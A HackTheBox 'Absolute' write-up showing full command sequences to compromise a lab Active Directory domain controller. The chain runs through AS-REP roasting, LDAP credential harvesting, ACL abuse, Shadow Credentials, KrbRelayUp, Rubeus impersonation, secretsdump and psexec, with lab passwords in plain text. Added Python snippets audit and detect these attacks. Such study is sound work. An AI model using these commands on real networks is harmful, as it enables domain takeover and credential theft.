HackTheBox — Absolute

ARZ101
16 min read · May 27, 2023

Absolute involved extracting usernames from the metadata of the site's images, using a tool named Username Anarchy to generate candidate username formats, and using kerbrute to find which of those are valid. One of them, d.klay, has Kerberos pre-authentication disabled, leading to AS-REP roasting. After cracking the hash the credentials still won't work because NTLM authentication is disabled, so we generate a TGT instead, which gives us access to LDAP; there we find svc_smb's password in the user's description. With that user the Shared SMB share can be accessed, containing compiler.sh and test.exe; analysing the exe's traffic in Wireshark shows it authenticating to LDAP with m.lovegod's credentials. With this account we can enumerate the domain with python-bloodhound, which shows that we can take over winrm_user by abusing GenericWrite with a technique called Shadow Credentials. That account gives us a session through WinRM, and running winPEAS reveals that the machine is vulnerable to KrbRelayUp, which gives us access to the Administrator user.

NMAP

Nmap scan report for 10.10.11.181                                                                                                    
Host is up (0.11s latency).
Not shown: 65508 closed ports
PORT STATE SERVICE VERSION
53/tcp open domain?
| fingerprint-strings:
| DNSVersionBindReqTCP:
| version
|_ bind
80/tcp open http Microsoft IIS httpd 10.0
| http-methods:
| Supported Methods: OPTIONS TRACE GET HEAD POST
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Absolute
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2022-09-25 02:06:22Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: absolute.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc.absolute.htb
| Subject Alternative Name: othername:<unsupported>, DNS:dc.absolute.htb
| Issuer: commonName=absolute-DC-CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha1WithRSAEncryption
| Not valid before: 2022-06-09T08:14:24
| Not valid after: 2023-06-09T08:14:24
| MD5: bfc0 67ac a80d 4a43 c767 70e3 daac 4089
|_SHA-1: d202 0dbd 811c 7e36 ad9e 120b e6eb a110 8695 f3f7
|_ssl-date: 2022-09-25T02:08:58+00:00; +7h00m00s from scanner time.
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: absolute.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc.absolute.htb
| Subject Alternative Name: othername:<unsupported>, DNS:dc.absolute.htb
| Issuer: commonName=absolute-DC-CA
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: absolute.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc.absolute.htb
| Subject Alternative Name: othername:<unsupported>, DNS:dc.absolute.htb
| Issuer: commonName=absolute-DC-CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha1WithRSAEncryption
| Not valid before: 2022-06-09T08:14:24
| Not valid after: 2023-06-09T08:14:24
| MD5: bfc0 67ac a80d 4a43 c767 70e3 daac 4089
|_SHA-1: d202 0dbd 811c 7e36 ad9e 120b e6eb a110 8695 f3f7
|_ssl-date: 2022-09-25T02:08:58+00:00; +7h00m00s from scanner time.
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: absolute.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc.absolute.htb
| Subject Alternative Name: othername:<unsupported>, DNS:dc.absolute.htb
| Issuer: commonName=absolute-DC-CA
| Public Key type: rsa
| Public Key bits: 2048
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp open mc-nmf .NET Message Framing
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49669/tcp open msrpc Microsoft Windows RPC
49670/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49671/tcp open msrpc Microsoft Windows RPC
49681/tcp open msrpc Microsoft Windows RPC
49682/tcp open msrpc Microsoft Windows RPC
49690/tcp open msrpc Microsoft Windows RPC
49704/tcp open msrpc Microsoft Windows RPC
54894/tcp open msrpc Microsoft Windows RPC

PORT 445 (SMB)

Checking for anonymous login on SMB works, but it doesn't list any shares.

PORT 80 (HTTP)

The site only shows a static page with nothing to interact with, so we fuzz for files and directories with gobuster.

Next, fuzzing for subdomains or vhosts with wfuzz.

This didn't find anything either. Going back to the site, there are some images which don't show anything meaningful by themselves, but their EXIF data does reveal usernames.

We can grab the usernames from all images with exiftool in a one-liner:

exiftool *.jpg | grep Author | awk '{print $3,$4}'

We have names, but we still need to figure out which username format the domain uses: it could be firstname.lastname, first initial plus last name, and so on. For that I used a tool called Username Anarchy:

username-anarchy -i ./names.txt -f firstlast,first.last

Foothold (d.klay)

Now that we have the candidate usernames, we can use kerbrute to see which of them exist in the domain, assuming we generated the right format:

kerbrute userenum ./generated_names.txt -d absolute.htb --dc 10.10.11.181

From the output we can see that kerbrute found d.klay, which doesn't have pre-authentication enabled, so the account is AS-REP roastable. Before we go cracking the hash kerbrute returned: hashcat doesn't support cracking etype 18, so we need to request the hash again with impacket's GetNPUsers:

python3 GetNPUsers.py absolute.htb/uwu@dc.absolute.htb -usersfile ./generated_names.txt -request

This hash can now be cracked with hashcat, as it supports etype 23:

hashcat -a 0 -m 18200 ./hash.txt /opt/SecLists/Passwords/rockyou.txt --force

I tried using the credentials on RPC and SMB but got an account restriction error.

The credentials didn't work on LDAP either. I tried password spraying, which showed that none of the valid usernames are allowed on SMB.

This could mean that NTLM authentication is disabled, so let's try Kerberos-based authentication instead. For that we'll need d.klay's TGT, which we can request with impacket's getTGT.py:

python3 getTGT.py absolute.htb/d.klay

Now, using smbclient.py from impacket, we can authenticate with Kerberos to list shares:

python3 smbclient.py absolute.htb/d.klay@dc.absolute.htb -k -no-pass -debug

But it shows a clock skew error, which means that we need to synchronize our time with the domain controller:

sudo ntpdate 10.10.11.181

The only shares accessible to this user were NETLOGON and SYSVOL, which don't seem to have anything interesting. Next, logging in through rpcclient with Kerberos auth, which requires setting up krb5.conf:

[libdefaults]
    default_realm = ABSOLUTE.HTB

[realms]
    ABSOLUTE.HTB = {
        kdc = 10.10.11.181
    }

We can get more users through enumdomusers:

rpcclient -U absolute.htb/d.klay dc.absolute.htb -k

I checked whether the pre-auth flag was unset on any of the new users we got.

Privilege Escalation (svc_smb)

That wasn't the case, so I decided to go back and check LDAP through Kerberos auth. I needed to update cme first, as it was giving an error on LDAP.

Now checking whether we can access LDAP and enumerate users:

poetry run crackmapexec ldap 10.10.11.181 -k --kdcHost dc.absolute.htb --users

The description of the svc_smb user contains its password, AbsoluteSMBService123!. We need to generate a TGT again for this user to access SMB and see which shares we can access now.
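The two directory findings so far, a user with pre-authentication disabled and a service account whose password sits in its description, are both things a defender can audit directly from LDAP attributes. The following is an added example, not code from the writeup: it checks the real DONT_REQ_PREAUTH bit (0x400000) of userAccountControl and scans description fields for credential-looking text. The user records are constructed to mirror the writeup; the userAccountControl values are illustrative.

```python
import re

# userAccountControl bit that disables Kerberos pre-authentication (ADS_UF_DONT_REQUIRE_PREAUTH).
DONT_REQ_PREAUTH = 0x400000
# Words suggesting that a credential was pasted into a free-text attribute.
PASSWORD_HINT = re.compile(r"(?:pass(?:word)?|pwd|credential)", re.IGNORECASE)
# A token with upper, lower, digit and a symbol looks like a password, not a sentence.
PASSWORD_LIKE = re.compile(r"(?=\S*[A-Z])(?=\S*[a-z])(?=\S*\d)(?=\S*[^\w\s])\S{8,}")

def audit_user(entry):
    """Return a list of findings for one user record (dict of LDAP attribute -> value)."""
    findings = []
    uac = int(entry.get("userAccountControl", 0))
    if uac & DONT_REQ_PREAUTH:
        findings.append("DONT_REQ_PREAUTH set: AS-REP roastable")
    desc = entry.get("description", "") or ""
    if PASSWORD_HINT.search(desc) or PASSWORD_LIKE.search(desc):
        findings.append("description looks like it contains a credential")
    return findings

def audit_users(entries):
    """Map sAMAccountName -> findings, omitting accounts with nothing to report."""
    return {e["sAMAccountName"]: f for e in entries if (f := audit_user(e))}

# Constructed sample records modelled on the writeup (not real directory output).
SAMPLE_USERS = [
    {"sAMAccountName": "d.klay", "userAccountControl": 0x400200, "description": ""},
    {"sAMAccountName": "svc_smb", "userAccountControl": 0x10200,
     "description": "AbsoluteSMBService123!"},
    {"sAMAccountName": "m.lovegod", "userAccountControl": 0x200, "description": "Network team"},
]

if __name__ == "__main__":
    for name, findings in audit_users(SAMPLE_USERS).items():
        print(name, "->", "; ".join(findings))
```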

Listing shares with cme, we can see that this user can access Shared.

In Shared we see two files.

From compile.sh it seems that the exe is compiled from Nim.

Running the exe on a Windows machine doesn't show any output.

Adding the hostname to c:\windows\system32\drivers\etc\hosts.

Privilege Escalation (m.lovegod)

After adding the hostname, if we check Wireshark while running the exe, we'll see that it's trying to connect to LDAP using credentials.

Opening the packet gives us the password for m.lovegod, which is AbsoluteLDAP2022!

This user didn't give us any special access. I had seen a tweet from JazzPizazz during the box release: he modified python-bloodhound to work with Kerberos authentication.

python3 bloodhound.py -u m.lovegod -k -d absolute.htb -dc dc.absolute.htb -no-pass -c all -ns 10.10.11.181

This worked, and we have domain data which we can import into BloodHound.

Checking which groups m.lovegod is part of.

Here we see that he is a member of three groups, of which Networkers looks like a custom group. Enumerating this group:

It has WriteOwner permissions on the Network Audit object, and looking further into that group, it has GenericWrite on winrm_user.

So the path to follow is: m.lovegod is a member of the Networkers group, which has the WriteOwner ACL, so we can become owner of the Network Audit group, grant ourselves permission to add members, add m.lovegod to Network Audit, and then add an SPN to winrm_user and Kerberoast it, which is known as targeted Kerberoasting.
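The chain above is a graph problem: MemberOf edges pass a group's rights down to its members, and WriteOwner, WriteDacl or GenericWrite on an object amount to control of it. As an added example (not the writeup's code and not BloodHound's own query engine), the following walks a constructed edge list that mirrors the relationships found in BloodHound and answers the defender's question of who can reach winrm_user; the edge kind names are BloodHound's, the edge list itself is assumed from the text.

```python
from collections import deque

# BloodHound relationship kinds that let a principal take control of another object.
# WriteOwner -> take ownership -> rewrite the DACL -> full control; GenericWrite on a
# user allows setting an SPN (targeted Kerberoast) or msDS-KeyCredentialLink.
CONTROL_EDGES = {"Owns", "WriteOwner", "WriteDacl", "GenericAll", "GenericWrite", "AddMember"}

def build_graph(edges):
    """Adjacency list over MemberOf (rights are inherited from groups) and control edges."""
    graph = {}
    for src, kind, dst in edges:
        if kind == "MemberOf" or kind in CONTROL_EDGES:
            graph.setdefault(src, []).append((kind, dst))
    return graph

def control_path(edges, start, target):
    """Breadth-first search; returns the shortest list of (src, kind, dst) hops or None."""
    graph = build_graph(edges)
    queue, seen = deque([(start, [])]), {start}
    while queue:
        node, path = queue.popleft()
        if node == target:
            return path
        for kind, nxt in graph.get(node, []):
            if nxt not in seen:
                seen.add(nxt)
                queue.append((nxt, path + [(node, kind, nxt)]))
    return None

def who_controls(edges, target):
    """Defender view: every principal with some control path to the target, sorted by name."""
    nodes = {n for src, _, dst in edges for n in (src, dst)}
    return sorted(n for n in nodes if n != target and control_path(edges, n, target))

def describe(path):
    """Render a path as 'a [edge] -> b [edge] -> c'."""
    return " -> ".join(f"{src} [{kind}]" for src, kind, _ in path) + f" -> {path[-1][2]}"

# Constructed edge list mirroring the relationships the writeup found in BloodHound.
ABSOLUTE_EDGES = [
    ("m.lovegod", "MemberOf", "Networkers"),
    ("Networkers", "WriteOwner", "NETWORK AUDIT"),
    ("NETWORK AUDIT", "GenericWrite", "winrm_user"),
]

if __name__ == "__main__":
    print(describe(control_path(ABSOLUTE_EDGES, "m.lovegod", "winrm_user")))
    print("principals that can reach winrm_user:", who_controls(ABSOLUTE_EDGES, "winrm_user"))
```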

The problem is that we don't have a shell, and for this we'd normally use PowerView or the AD module. I tried powerview.py and ldap_shell but they didn't work; ldapsearch was working, though, and it shows the key credential property, which we can abuse as well.

ldapsearch -LLL -Y GSSAPI -H ldap://dc.absolute.htb -b "dc=absolute,dc=htb"

I saw a tweet from Shutdown sharing a branch of impacket through which we can abuse WriteOwner and WriteDACL.

Digging further, I found a resource on abusing WriteOwner using the author's script.

But this script isn't merged into the main impacket repo, so we need to create a Python virtual environment and install impacket there so that it doesn't interfere with the currently installed impacket.

With the Python virtual environment created, clone the repo:

git clone --branch dacledit https://github.com/ShutdownRepo/impacket.git

Copy owneredit.py from the owneredit branch and install impacket.

Once it's installed, with owneredit we make m.lovegod the owner of the Network Audit group:

python3 ./owneredit.py -action write -target 'NETWORK AUDIT' -new-owner 'm.lovegod' 'absolute.htb'/'m.lovegod' -k -no-pass -dc-ip 10.10.11.181

Privilege Escalation (winrm_user)

Now, being the owner of the audit group, we can give m.lovegod full control over the group, including adding members, so that m.lovegod ends up with GenericWrite on winrm_user:

python3 dacledit.py -action 'write' -rights 'FullControl' -principal 'm.lovegod' -target 'NETWORK AUDIT' 'absolute.htb'/'m.lovegod' -k -no-pass -dc-ip 10.10.11.181

All that is left is to add m.lovegod to the audit group with net rpc:

net rpc group addmem 'Network Audit' 'm.lovegod' -U absolute.htb/m.lovegod -S dc.absolute.htb -k

We need to get the TGT again, as the permissions or configuration will otherwise be revoked.

With targeted Kerberoasting we can add an SPN to winrm_user and request a TGS:

python3 ./targetedKerberoast.py -d absolute.htb  -u m.lovegod --dc-ip 10.10.11.181 -k --no-pass -v

But this hash was not crackable. All of this can be done from a Windows machine as well: first synchronize time with the DC, which we can do with w32tm, but we do need to start the service first:

net start w32time
w32tm /config /manualpeerlist:dc.absolute.htb /syncfromflags:MANUAL /reliable:yes /update

Now that we are synchronized with the domain controller we can use PowerView, but for that we needed to change some configuration in the hosts file and the OpenVPN adapter, because without that it won't work properly and will fail with an error.

$SecPassword = ConvertTo-SecureString 'AbsoluteLDAP2022!' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('absolute.htb\m.lovegod', $SecPassword)

To make this work we need to add the domain controller's IP as the DNS server in the OpenVPN adapter's settings.

Make sure dc.absolute.htb isn't in the hosts file.

And now our PowerView commands will work.

Since I am now on a Windows machine, and I had previously made m.lovegod the owner of the Network Audit group on Linux a day earlier, chances are that has been revoked, so I'll just redo it with PowerView:

Set-DomainObjectOwner -Credential $Cred -Identity "NETWORK AUDIT" -OwnerIdentity "m.lovegod" -Domain 'absolute.htb' -DomainController dc.absolute.htb -V

Now giving him full control again:

Add-DomainObjectAcl -TargetIdentity "NETWORK AUDIT" -PrincipalIdentity m.lovegod -Rights All -Verbose -Credential $Cred -Domain 'absolute.htb'

Now adding m.lovegod to the Network Audit group so that we can abuse GenericWrite through targeted Kerberoasting:

Add-DomainGroupMember -Identity 'NETWORK AUDIT' -Members 'm.lovegod' -Domain 'absolute.htb' -Credential $Cred -Verbose

We can verify that m.lovegod has been added to the group.

Setting the SPN for winrm_user wasn't working, probably because the clean-up script was doing its job, but I'm not really sure why it didn't work as I was running the commands one after the other.

Set-DomainObject -Identity 'winrm_user' -Set @{serviceprincipalname='MSSQL/UwU'} -Domain 'absolute.htb' -DomainController dc.absolute.htb -Credential $Cred -Verbose

So what we can do is repeat the same process: make m.lovegod the owner of the audit group, give full control, add m.lovegod to the audit group and then generate a TGT. The ticket will retain these rights for the session regardless of the configuration being removed afterwards.

Checking that the ticket has been loaded.

But targeted Kerberoasting wasn't the way. Since there's GenericWrite on winrm_user, we can update msDS-KeyCredentialLink, allowing us to perform Shadow Credentials using pyWhisker:

python3 ./pywhisker.py -a add --dc-ip 10.10.11.181 -d absolute.htb -u 'm.lovegod' -k --no-pass -t winrm_user

Following PKINITtools we can request a TGT with the certificate, and with that we can get the NT hash; for that we need to have minikerberos installed.

python3 ./gettgtpkinit.py -cert-pfx ../pywhisker/luUEOlxx.pfx -pfx-pass p9nq1oiCzfgRbOWKMZWQ absolute.htb/winrm_user winrm_user.ccache

Export the TGT (the winrm_user.ccache file) into KRB5CCNAME, then recover the NT hash with getnthash.py using the AS-REP encryption key that gettgtpkinit.py printed:

python3 ./getnthash.py -key 1b9d937e95c70cc1dd37ad5c67be8d6ff7617fb8438d012236e0f4b3e1cb1e91 absolute.htb/winrm_user
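Both the AS-REP roast of d.klay earlier and the PKINIT logon just performed for winrm_user leave a distinctive trace in the domain controller's Kerberos TGT request events (Event ID 4768). As an added example (not part of the writeup), the following triages constructed 4768 records for those two patterns: a TGT issued without pre-authentication and with RC4 (etype 23, the encryption type GetNPUsers asks for so the hash is crackable), and a certificate-based logon for a plain user account, which is what a Shadow Credentials write followed by gettgtpkinit.py produces. Field names and PreAuthType values follow Microsoft's documentation for 4768; the sample records are constructed, not real log output.

```python
# Event ID 4768 (Kerberos TGT requested) fields, as named in the Windows Security log.
RC4_HMAC = 0x17                 # TicketEncryptionType for etype 23 (the crackable one)
PREAUTH_NONE = 0                # PreAuthType 0: logon without pre-authentication
PREAUTH_PKINIT = {15, 16, 17}   # PA-PK-AS-REP variants: certificate-based (PKINIT) logon

def parse_event(text):
    """Parse one constructed 'key=value; key=value' 4768 record into a dict."""
    ev = {}
    for pair in text.split(";"):
        key, _, val = pair.strip().partition("=")
        ev[key] = int(val, 0) if val.startswith("0x") or val.isdigit() else val
    return ev

def triage_4768(ev):
    """Name the attack pattern a successful TGT request matches, or None."""
    if ev.get("Status") != 0:
        return None  # failed requests yield no usable AS-REP or ticket
    if ev.get("PreAuthType") == PREAUTH_NONE and ev.get("TicketEncryptionType") == RC4_HMAC:
        # No pre-auth plus an RC4 ticket is the AS-REP roast shape from the writeup.
        return "asrep-roast-candidate"
    if ev.get("PreAuthType") in PREAUTH_PKINIT and not ev.get("TargetUserName", "").endswith("$"):
        # A plain user logging on with a certificate where no smart cards are deployed:
        # review msDS-KeyCredentialLink on that user for an unexpected key.
        return "pkinit-user-logon"
    return None

def triage_log(lines):
    """Return (account, rule) pairs for every record that matches a rule."""
    hits = []
    for line in lines:
        ev = parse_event(line)
        rule = triage_4768(ev)
        if rule:
            hits.append((ev["TargetUserName"], rule))
    return hits

# Constructed sample records (not real DC output) shaped like the requests in the writeup.
SAMPLE_4768 = [
    "TargetUserName=d.klay; ServiceName=krbtgt; TicketEncryptionType=0x17; PreAuthType=0; Status=0x0",
    "TargetUserName=m.lovegod; ServiceName=krbtgt; TicketEncryptionType=0x12; PreAuthType=2; Status=0x0",
    "TargetUserName=winrm_user; ServiceName=krbtgt; TicketEncryptionType=0x12; PreAuthType=16; Status=0x0",
    "TargetUserName=nobody; ServiceName=krbtgt; TicketEncryptionType=0x17; PreAuthType=0; Status=0x6",
]

if __name__ == "__main__":
    for account, rule in triage_log(SAMPLE_4768):
        print(f"{account}: {rule}")
```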

This can also be done through Rubeus by transferring the pfx file and asking for a TGT together with the NT hash:

Rubeus.exe asktgt /user:winrm_user /certificate:luUEOlxx.pfx /password:p9nq1oiCzfgRbOWKMZWQ /domain:absolute.htb /domaincontroller:dc.absolute.htb /getcredentials /show

We can't really do much with the NT hash alone, but the TGT can be used with WinRM to get a shell. For that I found a Ruby script which does Kerberos authentication for WinRM.

After cloning the repo I again ran into a problem:

winrm_kerb_shell.rb -s dc.absolute.htb -r ABSOLUTE.HTB

This can be resolved by following a guide which says to add the domain name in capitals to the hosts file.

Now the script works perfectly.

After authenticating with the WinRM service this saves a service ticket for WinRM, and we can use evil-winrm:

evil-winrm -i dc.absolute.htb -r ABSOLUTE.HTB

We can run winPEAS on the machine since Defender is disabled, and on running it we'll see that it reports the system as vulnerable to KrbRelayUp.

We can abuse this by following a blog post on it. To compile KrbRelayUp we need to use Visual Studio; after compiling we can transfer the executable to the target machine.

Following the blog post, we can abuse Shadow Credentials through KrbRelayUp. On running it, it wasn't working, so we probably need a different CLSID.

We can look up different CLSIDs from the list linked in the post.

Privilege Escalation (Administrator)

This time we get an access denied, so we have the CLSID correct but it isn't accessible to this user, so we'll probably need to run the exe as a different user such as m.lovegod. The issue was that running an exe as a different user was a pain: I tried Invoke-Command and some Runas scripts which didn't work, but the one which did work was RunasCs.

RunasCs.exe m.lovegod 'AbsoluteLDAP2022!' -d absolute.htb 'C:\Users\winrm_user\Documents\KrbRelayUp.exe full -m shadowcred --ForceShadowCred -cls 3c6859ce-230b-48a4-be6c-932c0c202048' -l 9

Now using Rubeus to get a TGT for the DC$ machine account with the generated certificate:

.\Rubeus.exe asktgt /user:DC$ /certificate:cert /password:password /enctype:AES256 /nowrap

Having the ticket, we can now impersonate the administrator user with S4U2self:

.\Rubeus.exe s4u /self /user:DC$ /impersonateuser:administrator /msdsspn:host/dc.absolute.htb /ticket:kirbi_ticket

Converting the administrator's .kirbi ticket to ccache so that we can use it with impacket scripts. First decode the base64 ticket that Rubeus printed:

echo "kirbiticket" | base64 -d > kirbiticket.kirbi

Then convert it into a ccache ticket with ticketConverter:

ticketConverter.py kirbiticket.kirbi ticket.ccache

Having the administrator's ticket, we can dump the SAM and NTDS.dit hashes:

secretsdump.py absolute.htb/administrator@dc.absolute.htb -k -no-pass

And now we can use any of impacket's exec scripts; I used psexec to get a shell:

psexec.py -k -no-pass absolute.htb/administrator@dc.absolute.htb
